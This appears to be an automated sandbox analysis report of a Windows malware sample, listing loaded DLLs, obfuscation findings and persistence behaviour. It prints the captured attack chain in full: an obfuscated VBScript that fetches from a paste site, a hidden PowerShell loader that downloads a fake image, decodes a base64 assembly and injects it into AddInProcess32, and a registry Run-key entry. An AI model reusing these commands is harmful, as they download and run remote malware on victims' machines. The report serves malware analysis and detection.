          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dll
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000005.00000002.1593249339.0000021C89401000.00000004.00000800.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          VBScript performs obfuscated calls to suspicious functions
          Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.CreateObject("WScript.Shell") posteridade = ("$perpetuadoralagoanodigalagoano = '") & berlinense & "'" posteridade = posteridade & ";$alagoanoWjuxd = [oxyosmiayoxyosmiatoutorgadamentem.Toutorgadamentext.outorgadamentenperpetuadoroding]::Uniperpetuadorodoutorgadamente.GoutorgadamentetString(" posteridade = posteridade & "[oxyosmiayoxyosmia" posteridade = posteridade & "toutorgadamente" posteridade = posteridade & "m.perpetuadoralagoano" posteridade = posteridade & "nvoutorgadamenter" posteridade = posteridade & "t]:" posteridade = posteridade & ":Fralagoano" posteridade = posteridade & "mbaoxyosmia" posteridade = posteridade & "outorgadamente64oxyosmiatring( $perpetuador" posteridade = posteridade & "alagoanod" posteridade = posteridade & "igalagoano.routorgadamente" posteridade = posteridade & "desoxygenarla" posteridade = posteridade & "perpetuadoroutorgadamente('" posteridade = posteridade & "DgTroutorgadamente" posteridade = posteridade & "','" posteridade = posteridade & "A" posteridade = posteridade & "') ))" posteridade = posteridade & ";desoxygenaralagoanoweroxyosmiahell.outorgadamentexoutorgadamente -windowoxyosmiatyloutorgadamente hiddoutorgadamenten -outorgadamentexoutorgadamentecutiondesoxygenarolicy bydesoxygenarasoxyosmia -Nodesoxygenarrofiloutorgadamente -command $OWjuxD" posteridade = Replace(posteridade,"desoxygenar","p") posteridade = Replace(posteridade,"perpetuador","c") posteridade = Replace(posteridade,"outorgadamente","e") posteridade = Replace(posteridade,"alagoano","o") posteridade = Replace(posteridade,"oxyosmia","s") dionina1 = "desoxygenaralagoanoweroxyosmiahell -perpetuadoralagoanommand " dionina1 = Replace(dionina1,"perpetuador","c") dionina1 = Replace(dionina1,"oxyosmia","s") dionina1 = Replace(dionina1,"alagoano","o") dionina1 = Replace(dionina1,"desoxygenar","p") dionina = dionina1 & """" & posteridade & """" Cama.Run dionina, 0, False IServerXMLHTTPRequest2.open("GET", "https://paste.ee/d/3dasY", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.CreateObject("WScript.Shell");IWshShell3.Run("powershell -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreC", "0", "false")
          Found suspicious powershell code related to unpacking or dynamic code loading
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTreb
          Suspicious powershell command line found
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_01699808 push esp; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_065D3400 pushfd ; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_065D3388 push esp; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_066FF6A3 pushfd ; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_066FF1D3 push eax; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_067035B8 push esp; retf 0643h
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_067F06F0 push eax; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_067F4378 pushfd ; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_067FD861 push C0065C6Fh; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_06836192 push eax; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_0684A780 pushfd ; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_0684A2F8 push esp; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 9_2_0684A329 pushad ; ret

          Boot Survival

          barindex
          Creates autostart registry keys with suspicious values (likely registry only malware)
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path \\tsclient\C\Program Files\aburrar.vbsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PathJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PathJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
